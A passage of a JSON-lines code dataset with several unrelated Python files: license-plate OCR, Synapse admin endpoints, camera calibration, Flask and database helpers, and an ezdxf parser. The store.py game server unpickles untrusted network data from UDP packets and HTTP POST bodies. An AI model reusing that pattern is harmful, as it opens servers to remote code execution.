text[2] >= \"A\" and text[2] <= \"Z\"\r\n and text[3] >= \"0\" and text[3] <= \"9\"\r\n and ((text[4] >= \"0\" and text[4] <= \"9\"))\r\n and text[5] >= \"0\" and text[5] <= \"9\" \r\n \r\n and text[6] >= \"0\" and text[6] <= \"9\"):\r\n \r\n Case=8\r\n # \r\n # Case of license plate format AAANNN\r\n #\r\n else:\r\n if len(text) > 5:\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"A\" and text[2] <= \"Z\"\r\n and text[3] >= \"0\" and text[3] <= \"9\"\r\n and (( text[4] >= \"0\" and text[4] <= \"9\") )\r\n \r\n and text[5] >= \"0\" and text[5] <= \"9\"):\r\n \r\n \r\n Case=9\r\n else: \r\n # Format AANNNN\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"0\" and text[2] <= \"9\"\r\n and text[3] >= \"0\" and text[3] <= \"9\"\r\n and (( text[4] >= \"0\" and text[4] <= \"9\") )\r\n \r\n and text[5] >= \"0\" and text[5] <= \"9\"):\r\n \r\n \r\n Case=10\r\n else:\r\n # Format ANAAA\r\n if len(text) > 4:\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n #pytesseract confuses 5 an S\r\n and ((text[1] >= \"0\" and text[1] <= \"9\") or text[1]==\"S\")\r\n and text[2] >= \"A\" and text[2] <= \"Z\"\r\n and text[3] >= \"A\" and text[3] <= \"Z\"\r\n and text[4] >= \"A\" and text[4] <= \"Z\"):\r\n \r\n \r\n Case=11\r\n \r\n \r\n \r\n TextConfidence=Confidence + \" threshold : \" + str(threshold)\r\n if Case > 0: \r\n if Case==1 or Case==2 or Case==3 or Case==4 or Case==5 or Case==7:\r\n print (\"Car \" + str(NumberImageOrder) + \" the license plate is recognized as : \" + text[0:7] + TextConfidence)\r\n Llicenses.append(text[0:7] )\r\n SwEnd=1\r\n else:\r\n if Case==8:\r\n print (\"Car \" + str(NumberImageOrder) + \" the license plate is recognized as : \" + text[1:7]+TextConfidence)\r\n Llicenses.append(text[1:7] )\r\n SwEnd=1\r\n else:\r\n if Case==9 or Case==10:\r\n print (\"Car \" + str(NumberImageOrder) + \" the license plate is recognized as : \" + text[0:6]+TextConfidence)\r\n Llicenses.append(text[0:6] )\r\n SwEnd=1\r\n else:\r\n if Case == 11 :\r\n print (\"Car \" + str(NumberImageOrder) + \" the license plate is recognized as : \" + text[0:5]+TextConfidence)\r\n Llicenses.append(text[0:5] )\r\n \r\n \r\n SwEnd=0\r\n \r\n #\r\n # Halfway through the loop, \r\n # it searches in the negative direction for the threshold\r\n #\r\n if ContLoop==ContLoopMax/2:\r\n threshold=threshold- Incthreshold*ContLoop\r\n if ContLoop>=ContLoopMax/2:\r\n threshold=threshold-Incthreshold\r\n else:\r\n threshold=threshold+Incthreshold\r\n \r\n LTotLicenses=[]\r\n LSumLicenses=[]\r\n TotLicences=0\r\n for y in range(len(Llicenses)):\r\n \r\n SwFounded=0\r\n for z in range(len(LTotLicenses)):\r\n if Llicenses[y]==LTotLicenses[z]:\r\n LSumLicenses[z]=LSumLicenses[z]+1\r\n TotLicences=TotLicences+1\r\n SwFounded=1\r\n break\r\n if SwFounded==0:\r\n LTotLicenses.append(Llicenses[y])\r\n LSumLicenses.append(1)\r\n TotLicences=TotLicences+1\r\n \r\n print(\"Licenses Car \" + str(NumberImageOrder)) \r\n \r\n bubbleSort(LSumLicenses,LTotLicenses)\r\n TextDetect=\"\"\r\n for w in range(len(LTotLicenses)):\r\n percent=LSumLicenses[w]/TotLicences\r\n #https://docs.python.org/3/tutorial/inputoutput.html\r\n print (LTotLicenses[w] + \" {:2.2%}\".format(percent))\r\n \r\n \r\n if LTotLicenses[w] == TrueLicenses[i]:\r\n \r\n if w==0:\r\n TotHits=TotHits+1\r\n TextDetect=\" HIT\" + \" {:2.2%}\".format(percent)\r\n #break\r\n else:\r\n TotDetect=TotDetect+1\r\n TextDetect=\" DETECTED \" + \" {:2.2%}\".format(percent)\r\n #break\r\n if TextDetect==\"\":\r\n if len(LTotLicenses)==0:\r\n TotNoDetect=TotNoDetect+1\r\n TextDetect= \" DID NOT DETECT ANY LICENSE PLATE\"\r\n else:\r\n TotDetectBad=TotDetectBad+1\r\n TextDetect= \" ERROR, DETECTED OTHER LICENSE PLATE\"\r\n print( \"Car \" + str(NumberImageOrder) + \" the true license plate is: \" + TrueLicenses[i] + TextDetect) \r\n\r\nprint(\"\")\r\nprint(\"\")\r\nprint(\" total HITS : \" + str(TotHits))\r\nprint(\" total DETECTED : \" + str(TotDetect)) \r\nprint(\" total ERRONEOUS DETECTED : \" + str(TotDetectBad)) \r\nprint(\" total DID NOT RECOGNIZED : \" + str(TotNoDetect)) \r\n ","repo_name":"ablanco1950/LicensePlateImage_ThresholdFiltered","sub_path":"GetNumberLicencePlateV1.py","file_name":"GetNumberLicencePlateV1.py","file_ext":"py","file_size_in_byte":22504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9023240135","text":"import numpy as np\n\ndef comp_grad(f_ori, f_par):\n\tori = np.load(f_ori)\n\tpar = np.load(f_par)\n\n\tnsli = ori.shape[0]\n\tnrow = ori.shape[1]\n\tncol = ori.shape[2]\n\tndir = ori.shape[3]\n\n\tdiff = np.sum(np.abs(ori - par) > 1.e+7)\n\tif diff > 0:\n\t\tprint(diff)\n\t\tprint('different voxels')\n\telse:\n\t\tprint(diff)\n\t\tprint('all voxels are the same!')\n\n\n\n# A = np.ones((20, 20, 10))\n# B = 2 * np.ones((20, 20, 10))\n# s = np.sum(np.abs(A - B))","repo_name":"RicciWoo/registration","sub_path":"comp_npy_grad_3d.py","file_name":"comp_npy_grad_3d.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"28438648534","text":"import logging\nfrom typing import TYPE_CHECKING, Tuple\n\nfrom synapse.api.errors import SynapseError\nfrom synapse.http.servlet import RestServlet, parse_json_object_from_request\nfrom synapse.http.site import SynapseRequest\nfrom synapse.rest.admin._base import admin_patterns, assert_user_is_admin\nfrom synapse.types import JsonDict\n\nif TYPE_CHECKING:\n from synapse.server import HomeServer\n\nlogger = logging.getLogger(__name__)\n\n\nclass BackgroundUpdateEnabledRestServlet(RestServlet):\n \"\"\"Allows temporarily disabling background updates\"\"\"\n\n PATTERNS = admin_patterns(\"/background_updates/enabled\")\n\n def __init__(self, hs: \"HomeServer\"):\n self.group_server = hs.get_groups_server_handler()\n self.is_mine_id = hs.is_mine_id\n self.auth = hs.get_auth()\n\n self.data_stores = hs.get_datastores()\n\n async def on_GET(self, request: SynapseRequest) -> Tuple[int, JsonDict]:\n requester = await self.auth.get_user_by_req(request)\n await assert_user_is_admin(self.auth, requester.user)\n\n # We need to check that all configured databases have updates enabled.\n # (They *should* all be in sync.)\n enabled = all(db.updates.enabled for db in self.data_stores.databases)\n\n return 200, {\"enabled\": enabled}\n\n async def on_POST(self, request: SynapseRequest) -> Tuple[int, JsonDict]:\n requester = await self.auth.get_user_by_req(request)\n await assert_user_is_admin(self.auth, requester.user)\n\n body = parse_json_object_from_request(request)\n\n enabled = body.get(\"enabled\", True)\n\n if not isinstance(enabled, bool):\n raise SynapseError(400, \"'enabled' parameter must be a boolean\")\n\n for db in self.data_stores.databases:\n db.updates.enabled = enabled\n\n # If we're re-enabling them ensure that we start the background\n # process again.\n if enabled:\n db.updates.start_doing_background_updates()\n\n return 200, {\"enabled\": enabled}\n\n\nclass BackgroundUpdateRestServlet(RestServlet):\n \"\"\"Fetch information about background updates\"\"\"\n\n PATTERNS = admin_patterns(\"/background_updates/status\")\n\n def __init__(self, hs: \"HomeServer\"):\n self.group_server = hs.get_groups_server_handler()\n self.is_mine_id = hs.is_mine_id\n self.auth = hs.get_auth()\n\n self.data_stores = hs.get_datastores()\n\n async def on_GET(self, request: SynapseRequest) -> Tuple[int, JsonDict]:\n requester = await self.auth.get_user_by_req(request)\n await assert_user_is_admin(self.auth, requester.user)\n\n # We need to check that all configured databases have updates enabled.\n # (They *should* all be in sync.)\n enabled = all(db.updates.enabled for db in self.data_stores.databases)\n\n current_updates = {}\n\n for db in self.data_stores.databases:\n update = db.updates.get_current_update()\n if not update:\n continue\n\n current_updates[db.name()] = {\n \"name\": update.name,\n \"total_item_count\": update.total_item_count,\n \"total_duration_ms\": update.total_duration_ms,\n \"average_items_per_ms\": update.average_items_per_ms(),\n }\n\n return 200, {\"enabled\": enabled, \"current_updates\": current_updates}\n","repo_name":"casio/synapse","sub_path":"synapse/rest/admin/background_updates.py","file_name":"background_updates.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"23452580206","text":"# calibration.py\n# This calibrates for an adjustable (fwidth, fheight) shape image for each of 3 cameras\n# imports\nfrom imutils.video import VideoStream\nfrom datetime import datetime\nimport numpy as np\nimport imutils\nfrom time import sleep\nimport cv2\n\nvideo = False\nfps = 5\nx_adjust = 0\nfwidth = 640 # 608\nfheight = 480 # 464\nhalf_fwidth = fwidth//2\nhalf_fheight = fheight//2\nstamp = datetime.now().strftime(\"%Y-%m-%d %H-%M-%S\")\ncalibration012 = \"/home/pi/md4/\" + stamp + \" calibration012.avi\"\n\nvs0 = VideoStream(usePiCamera=False,src=0).start() # left Zealinno webcam\nvs1 = VideoStream(usePiCamera=True,src=1,resolution=(fwidth,fheight)).start()\nvs2 = VideoStream(usePiCamera=False,src=2).start() # right Zealinno webcam\nif video == True:\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out012 = cv2.VideoWriter(calibration012,fourcc, fps, (3*fwidth,fheight))\nframe_count = 0\nsleep(10.0)\n\n# loop over the frames of the video\nwhile True:\n # grab the current frame\n frame0 = vs0.read()\n frame1 = vs1.read()\n frame2 = vs2.read()\n if frame0 is None or frame2 is None:\n break\n frame_count += 1 \n if frame_count == 1:\n print('frame shapes = ', frame0.shape, frame1.shape, frame2.shape)\n\n # Horizontal pixel x range = 0:fwidth-1\n # Vertical pixel y range = 0:fheight-1\n cv2.line(frame0, (half_fwidth, 0), (half_fwidth, fheight-1), (0, 0, 255), 1)\n cv2.line(frame0, (0, half_fheight), (fwidth-1, half_fheight), (255, 0, 255), 1)\n \n cv2.line(frame1, (half_fwidth, 0), (half_fwidth, fheight-1), (0, 0, 255), 1)\n cv2.line(frame1, (0, half_fheight), (fwidth-1, half_fheight), (255, 0, 255), 1)\n\n cv2.line(frame2, (half_fwidth+x_adjust, 0), (half_fwidth+x_adjust, fheight-1), (0, 0, 255), 1)\n cv2.line(frame2, (0, half_fheight), (fwidth-1, half_fheight), (255, 0, 255), 1)\n \n frame012 = np.hstack((frame0,frame1,frame2))\n cv2.imshow('frame012', frame012) \n if video == True:\n out012.write(frame012)\n key = cv2.waitKey(1) & 0xFF\n # if the `q` key is pressed, break from the loop\n if key == ord(\"q\"): # otherwise go to next loop iteration\n break\n\nif video == True:\n out012.release()\n# cleanup the camera and close any open windows\nvs0.stop()\nvs1.stop()\nvs2.stop()\ncv2.destroyAllWindows()\n","repo_name":"duncanrpi/cameraTracking","sub_path":"pi/md4/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8031369799","text":"# Store saves map sections for fronts to be retrieved if necessary\n# Jarkko Kovala \n\nimport settings\n\nimport sys\nimport socket\nimport struct\nimport time\nimport threading\nimport random\nimport queue\nimport pickle\nimport urllib\nfrom urllib.parse import urlparse, parse_qs\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nsections = {} # The map sections\nsections_lock = threading.Lock()\n\nfronts = {} # The fronts\nfronts_lock = threading.Lock()\n\naddrport = settings.STORE_ADDRPORT\n\n# Attempt to send, generate packet loss for testing\ndef try_send(s, packet, addr):\n if(random.randint(1, 100) > settings.PACKET_LOSS):\n s.sendto(packet, addr)\n\n# Update an object\ndef update_object(section, version, obj_id, obj):\n section[\"version\"] = version\n\n if obj == None: # Object was removed\n print(\"Removing object\", obj_id, \"from section\", section[\"name\"], \"ver\", version)\n del section[\"objects\"][obj_id]\n else:\n print(\"Updating object\", obj_id, \"in section\", section[\"name\"], \"ver\", version)\n section[\"objects\"][obj_id] = obj\n\n# Clean internal data from map section for sending\ndef clean_section(section):\n section = section.copy()\n\n for x in (\"recv_buffer\", \"last_ack\", \"front\"):\n if x in section:\n del section[x]\n\n return section\n\n# HTTP request handler for store\nclass store_http_handler(BaseHTTPRequestHandler):\n def do_GET(self):\n protocol_version = \"HTTP/1.1\"\n\n query = urlparse(self.path)\n vars = parse_qs(query.query)\n\n if query.path == \"/map\": # Request to retrieve a map section\n section = int(vars[\"section\"][0])\n\n with sections_lock:\n if section in sections:\n print(\"Section\", section, \"requested, sending\")\n self.send_response(200)\n self.end_headers()\n self.wfile.write(pickle.dumps((clean_section(sections[section]), {})))\n else:\n print(\"Section\", section, \"requested but we don't have it\")\n self.send_response(404)\n self.end_headers()\n\n def do_POST(self):\n protocol_version = \"HTTP/1.1\"\n\n query = urlparse(self.path)\n content_len = int(self.headers.get('Content-Length'))\n if content_len > 0:\n body = self.rfile.read(content_len)\n\n if query.path == \"/map\": # Request to store a map section\n section_id, section, front_id, front = pickle.loads(body)\n\n print(\"Storing section\", section_id, \"for front\", front_id)\n\n with sections_lock, fronts_lock:\n sections[section_id] = section\n sections[section_id][\"front\"] = front_id\n sections[section_id][\"recv_buffer\"] = {}\n sections[section_id][\"last_ack\"] = section[\"version\"]\n fronts[front_id] = front\n \n self.send_response(200)\n self.end_headers()\n\n# UDP listener thread for store\ndef store_listener():\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.bind(settings.STORE_ADDRPORT)\n\n while True:\n data, addr = s.recvfrom(1024)\n\n if data[:6] == b\"UPDATE\": # Update for an object\n with sections_lock, fronts_lock:\n section, version, obj_id, obj = pickle.loads(data[6:])\n\n if fronts[sections[section][\"front\"]] == addr: # Check if it was the correct front\n # If we haven't received this then store in buffer\n if version > sections[section][\"last_ack\"] and version not in sections[section][\"recv_buffer\"]:\n sections[section][\"recv_buffer\"][version] = (obj_id, obj)\n\n # Acknowledge the update\n try_send(s, b\"ACK\" + struct.pack(\"!ll\", section, version), addr)\n \n # Process received updates consecutively\n while sections[section][\"last_ack\"] + 1 in sections[section][\"recv_buffer\"]:\n seq = sections[section][\"last_ack\"] + 1\n obj_id, obj = sections[section][\"recv_buffer\"].pop(seq)\n update_object(sections[section], seq, obj_id, obj)\n sections[section][\"last_ack\"] += 1\n\n# HTTP server thread for store \ndef store_http_server():\n httpd = HTTPServer(addrport, store_http_handler)\n\n try:\n print(\"Starting HTTP server at\", addrport)\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n\n httpd.server_close()\n\ndef main():\n # First store initial section data from settings\n for front in settings.INITIAL_SECTIONS_FOR_FRONTS:\n for section in settings.INITIAL_SECTIONS_FOR_FRONTS[front]:\n print(\"Adding initial section\", section)\n sections[section] = settings.INITIAL_SECTIONS_FOR_FRONTS[front][section]\n print(sections[section])\n\n store_http_server_thread = threading.Thread(target=store_http_server)\n store_http_server_thread.start()\n\n store_listener_thread = threading.Thread(target=store_listener)\n store_listener_thread.start()\n\n store_http_server_thread.join()\n store_listener_thread.join()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jarkkokovala/nss","sub_path":"design-assignment-game/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":5396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37527047564","text":"import random\nimport logging\n\nfrom mypinnings import database\nfrom mypinnings import media\n\n\nlogger = logging.getLogger('mypinnings.pin_utils')\n\n\nDIGITS_AND_LETTERS = 'abcdefghijklmnopqrstuvwxwzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n\n\nclass PinError(Exception):\n pass\n\n\ndef create_pin(db, user_id, title, description, link, tags, price, product_url,\n price_range, image_filename=None, board_id=None, repin=None):\n try:\n if image_filename:\n images_dict = media.store_image_from_filename(db, image_filename, widths=(202, 212))\n else:\n empty = {'url': None, 'width': None, 'height': None}\n images_dict = {0: empty, 202: empty, 212: empty}\n if not price:\n price = None\n external_id = _generate_external_id()\n pin_id = db.insert(tablename='pins',\n name=title,\n description=description,\n user_id=user_id,\n link=link,\n views=1,\n price=price,\n image_url=images_dict[0]['url'],\n image_width=images_dict[0]['width'],\n image_height=images_dict[0]['height'],\n image_202_url=images_dict[202]['url'],\n image_202_height=images_dict[202]['height'],\n image_212_url=images_dict[212]['url'],\n image_212_height=images_dict[212]['height'],\n product_url=product_url,\n price_range=price_range,\n external_id=external_id,\n board_id=board_id,\n repin=repin)\n if tags:\n tags = parse_tags(tags)\n values_to_insert = [{'pin_id':pin_id, 'tags':tag} for tag in tags]\n db.multiple_insert(tablename='tags', values=values_to_insert)\n pin = db.where(table='pins', id=pin_id)[0]\n return pin\n except:\n logger.error('Cannot insert a pin in the DB', exc_info=True)\n raise\n\n\ndef update_base_pin_information(db, pin_id, user_id, title, description, link, tags, price, product_url,\n price_range, board_id=None):\n if price == '':\n price = None\n db.update(tables='pins',\n where='id=$id and user_id=$user_id',\n vars={'id': pin_id, 'user_id': user_id},\n name=title,\n description=description,\n link=link,\n price=price,\n product_url=product_url,\n price_range=price_range,\n board_id=board_id,\n )\n db.delete(table='tags', where='pin_id=$pin_id', vars={'pin_id': pin_id})\n tags = parse_tags(tags)\n values_to_insert = [{'pin_id':pin_id, 'tags':tag} for tag in tags]\n db.multiple_insert(tablename='tags', values=values_to_insert)\n pin = db.where('pins', id=pin_id)[0]\n return pin\n\n\ndef update_pin_images(db, pin_id, user_id, image_filename):\n images_dict = media.store_image_from_filename(db, image_filename, widths=(202, 212))\n db.update(tables='pins',\n where='id=$id and user_id=$user_id',\n vars={'id': pin_id, 'user_id': user_id},\n image_url=images_dict[0]['url'],\n image_width=images_dict[0]['width'],\n image_height=images_dict[0]['height'],\n image_202_url=images_dict[202]['url'],\n image_202_height=images_dict[202]['height'],\n image_212_url=images_dict[212]['url'],\n image_212_height=images_dict[212]['height'],\n )\n\n\ndef update_pin_image_urls(db, pin_id, user_id, image_url, image_width, image_height,\n image_202_url, image_202_height, image_212_url, image_212_height):\n db.update(tables='pins',\n where='id=$id and user_id=$user_id',\n vars={'id': pin_id, 'user_id': user_id},\n image_url=image_url,\n image_width=image_width,\n image_height=image_height,\n image_202_url=image_202_url,\n image_202_height=image_202_height,\n image_212_url=image_212_url,\n image_212_height=image_212_height,\n )\n\n\ndef delete_pin_from_db(db, pin_id, user_id):\n results = db.where(table='pins', id=pin_id, user_id=user_id)\n for _ in results:\n break\n else:\n # this ping does not belog to the user?\n raise PinError('Item does not exists for you.')\n db.delete(table='likes', where='pin_id=$id', vars={'id': pin_id})\n db.delete(table='tags', where='pin_id=$id', vars={'id': pin_id})\n db.delete(table='pins_categories', where='pin_id=$id', vars={'id': pin_id})\n db.delete(table='comments', where='pin_id=$id', vars={'id': pin_id})\n db.delete(table='cool_pins', where='pin_id=$id', vars={'id': pin_id})\n db.delete(table='ratings', where='pin_id=$id', vars={'id': pin_id})\n db.update(tables='pins', where='repin=$id', vars={'id': pin_id}, repin=None)\n db.delete(table='pins', where='id=$id', vars={'id': pin_id})\n\n\ndef add_pin_to_categories(db, pin_id, category_id_list):\n if category_id_list:\n values_to_insert = []\n for category_id in category_id_list:\n values_to_insert.append({'pin_id': pin_id, 'category_id': category_id})\n db.multiple_insert(tablename='pins_categories', values=values_to_insert)\n\n\ndef remove_pin_from__all_categories(db, pin_id):\n db.delete(table='pins_categories', where='pin_id=$pin_id',\n vars={'pin_id': pin_id})\n\n\ndef update_pin_into_categories(db, pin_id, category_id_list):\n remove_pin_from__all_categories(db, pin_id)\n add_pin_to_categories(db, pin_id, category_id_list)\n\n\ndef parse_tags(value):\n parsed = []\n if value:\n separated = value.split('#')\n for v in separated:\n new_v = v.replace('#', '')\n new_v = new_v.strip()\n if new_v:\n parsed.append(new_v)\n return parsed\n\n\ndef add_hash_symbol_to_tags(value):\n if value:\n separated = value.split(' ')\n fixed = []\n for v in separated:\n if v.startswith('#'):\n fixed.append(v)\n else:\n new_v = '#{}'.format(v)\n fixed.append(new_v)\n return ' '.join(fixed)\n else:\n return value\n\n\ndef _generate_external_id():\n id = _new_external_id()\n while _already_exists(id):\n id = _new_external_id()\n return id\n\n\ndef _new_external_id():\n digits_and_letters = random.sample(DIGITS_AND_LETTERS, 9)\n return ''.join(digits_and_letters)\n\n\ndef _already_exists(id):\n db = database.get_db()\n results = db.where('pins', external_id=id)\n for _ in results:\n return True\n return False\n\n\ndef delete_all_pins_for_user(db, user_id):\n db.delete(table='likes', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.delete(table='tags', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.delete(table='pins_categories', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.delete(table='comments', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.delete(table='cool_pins', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.delete(table='ratings', where='pin_id in (select id from pins where user_id=$id)', vars={'id': user_id})\n db.update(tables='pins', where='repin in (select id from pins where user_id=$id)', vars={'id': user_id}, repin=None)\n db.delete(table='pins', where='id in (select id from pins where user_id=$id)', vars={'id': user_id})\n\n\nclass dotdict(dict):\n '''\n Special dict used for templates compatability\n '''\n def __getattr__(self, name):\n return self.get(name)\n","repo_name":"kissarat/pin","sub_path":"mypinnings/pin_utils.py","file_name":"pin_utils.py","file_ext":"py","file_size_in_byte":8010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17188923438","text":"substrings = input().split(\", \")\r\nwords = input().split(', ')\r\n\r\nresult = [subst for word in words for subst in substrings if subst in word]\r\n\r\nprint(sorted(set(result), key=result.index))\r\n# for word in words:\r\n# for subst in substrings:\r\n# if subst in word and not subst in result:\r\n# result.append(subst)\r\n\r\n# for substrings[i] in any_strings[i]:\r\n# if substrings[i] == any_strings:\r\n","repo_name":"Mario97popov/Fundamentals","sub_path":"lab10Lise advanced exc/Ex1 Which are in.py","file_name":"Ex1 Which are in.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38427721509","text":"from typing import TYPE_CHECKING, Iterator, Iterable, List, Any, Union\nimport abc\nfrom itertools import islice\n\nfrom ezdxf.lldxf.tags import group_tags, Tags\nfrom ezdxf.lldxf.const import DXFKeyError, DXFStructureError\n\nif TYPE_CHECKING:\n from ezdxf.eztypes import TagWriter, Drawing\n\n\nclass AcDsEntity(abc.ABC):\n @abc.abstractmethod\n def export_dxf(self, tagwriter: \"TagWriter\"):\n ...\n\n @abc.abstractmethod\n def dxftype(self) -> str:\n ...\n\n\nclass AcDsDataSection:\n name = \"ACDSDATA\"\n\n def __init__(self, doc: \"Drawing\", entities: Iterable[Tags] = None):\n self.doc = doc\n self.entities: List[AcDsEntity] = []\n self.section_info = Tags()\n if entities is not None:\n self.load_tags(iter(entities))\n\n @property\n def is_valid(self):\n return len(self.section_info)\n\n def load_tags(self, entities: Iterator[Tags]) -> None:\n section_head = next(entities)\n if section_head[0] != (0, \"SECTION\") or section_head[1] != (\n 2,\n \"ACDSDATA\",\n ):\n raise DXFStructureError(\n \"Critical structure error in ACDSDATA section.\"\n )\n\n self.section_info = section_head\n for entity in entities:\n self.append(AcDsData(entity)) # tags have no subclasses\n\n def append(self, entity: \"AcDsData\") -> None:\n cls = ACDSDATA_TYPES.get(entity.dxftype(), AcDsData)\n data = cls(entity.tags)\n self.entities.append(data)\n\n def export_dxf(self, tagwriter: \"TagWriter\") -> None:\n if not self.is_valid:\n return\n tagwriter.write_tags(self.section_info)\n for entity in self.entities:\n entity.export_dxf(tagwriter)\n tagwriter.write_tag2(0, \"ENDSEC\")\n\n @property\n def acdsrecords(self) -> Iterable[\"AcDsRecord\"]:\n return (\n entity for entity in self.entities if isinstance(entity, AcDsRecord)\n )\n\n def get_acis_data(self, handle: str) -> List[bytes]:\n for record in self.acdsrecords:\n try:\n section = record.get_section(\"AcDbDs::ID\")\n except DXFKeyError: # not present\n continue\n asm_handle = section.get_first_value(320, None)\n if asm_handle == handle:\n try:\n asm_data = record.get_section(\"ASM_Data\")\n except DXFKeyError: # no data stored\n break\n return [tag.value for tag in asm_data if tag.code == 310]\n return []\n\n\nclass AcDsData(AcDsEntity):\n def __init__(self, tags: Tags):\n self.tags = tags\n\n def export_dxf(self, tagwriter: \"TagWriter\"):\n tagwriter.write_tags(self.tags)\n\n def dxftype(self) -> str:\n return self.tags[0].value\n\n\nclass Section(Tags):\n @property\n def name(self) -> str:\n return self[0].value\n\n @property\n def type(self) -> str:\n return self[1].value\n\n @property\n def data(self) -> Tags:\n return Tags(self[2:])\n\n\nclass AcDsRecord(AcDsEntity):\n def __init__(self, tags: Tags):\n self._dxftype = tags[0]\n self.flags = tags[1]\n self.sections = [\n Section(group)\n for group in group_tags(islice(tags, 2, None), splitcode=2)\n ]\n\n def dxftype(self) -> str:\n return \"ACDSRECORD\"\n\n def has_section(self, name: str) -> bool:\n return self.get_section(name, default=None) is not None\n\n def get_section(self, name: str, default: Any = DXFKeyError) -> Section:\n for section in self.sections:\n if section.name == name:\n return section\n if default is DXFKeyError:\n raise DXFKeyError(name)\n else:\n return default\n\n def __len__(self):\n return len(self.sections)\n\n def __getitem__(self, item) -> Section:\n return self.sections[item]\n\n def _write_header(self, tagwriter: \"TagWriter\") -> None:\n tagwriter.write_tags(Tags([self._dxftype, self.flags]))\n\n def export_dxf(self, tagwriter: \"TagWriter\") -> None:\n self._write_header(tagwriter)\n for section in self.sections:\n tagwriter.write_tags(section)\n\n\nACDSDATA_TYPES = {\n \"ACDSRECORD\": AcDsRecord,\n}\n","repo_name":"kevancress/MeasureIt_ARCH","sub_path":"libs/ezdxf/sections/acdsdata.py","file_name":"acdsdata.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"69945213227","text":"from flask import Flask, render_template, redirect, url_for, request, session, g\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager, login_manager\nfrom flask_moment import Moment\nfrom flask_babel import Babel\n\n# Base app creation\napp = Flask(__name__)\napp.config.from_object('config')\n\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\n\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'auth.signup'\nlogin_manager.login_message = u\" \"\n\nmoment = Moment(app)\n\nbabel = Babel(app)\n\n\n# Blueprints registration\nfrom app.dashboard.controllers import board\napp.register_blueprint(board)\n\nfrom app.auth.controllers import auth\napp.register_blueprint(auth)\n\n# Error handlers\n@app.errorhandler(404)\ndef page_not_fount(e):\n return render_template('/errorcodes/404.html'), 404\n\n@app.errorhandler(500)\ndef internal_server_error(e):\n return render_template('500.html'), 500\n\n@app.before_request\ndef make_session_permanent():\n session.permanent = False\n\n# Babel locales\n@babel.localeselector\ndef get_locale():\n if not g.get('lang_code', None):\n g.lang_code = request.accept_languages.best_match(app.config['LANGUAGES'])\n return g.lang_code\n\n# Main routes\n@app.route('/')\ndef index():\n g.lang_code = request.accept_languages.best_match(app.config['LANGUAGES'])\n return redirect(url_for('dashboard.dashboard'))\n\n# GARBAGE\napp.jinja_env.add_extension('jinja2.ext.loopcontrols')\napp.jinja_env.globals['get_locale'] = get_locale\n\ndb.create_all()","repo_name":"jawdypus/Budget","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14597942339","text":"from simpleutil.log import log as logging\nfrom simpleutil.config import cfg\n\nfrom simpleservice.ormdb.api import MysqlDriver\n\nfrom goperation import lock\n\nfrom fluttercomic import common\n\nCONF = cfg.CONF\n\nDbDriver = None\n\n\nLOG = logging.getLogger(__name__)\n\n\ndef init_endpoint_session():\n global DbDriver\n if DbDriver is None:\n with lock.get('mysql-%s' % common.NAME):\n if DbDriver is None:\n LOG.info(\"Try connect database for %s\" % common.NAME)\n mysql_driver = MysqlDriver(common.NAME, CONF[common.NAME])\n mysql_driver.start()\n DbDriver = mysql_driver\n else:\n LOG.warning(\"Do not call init_endpoint_session more then once\")\n\n\ndef endpoint_session(readonly=False):\n if DbDriver is None:\n init_endpoint_session()\n return DbDriver.get_session(read=readonly,\n autocommit=True,\n expire_on_commit=False)\n","repo_name":"lolizeppelin/fluttercomic","sub_path":"fluttercomic/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1322902628","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Tests for moondog \"\"\"\n\nfrom bagit import BagError\nimport logging\nfrom moondog.images import ImageBag\nfrom nose.tools import assert_equal, assert_false, assert_true, raises\nfrom os import makedirs\nfrom os.path import abspath, exists, join, realpath\nfrom shutil import rmtree\nimport sys\nfrom unittest import TestCase\n\nlogger = logging.getLogger(__name__)\ntest_data_path = abspath(realpath(join('tests', 'data')))\ntest_bag_path = join(test_data_path, 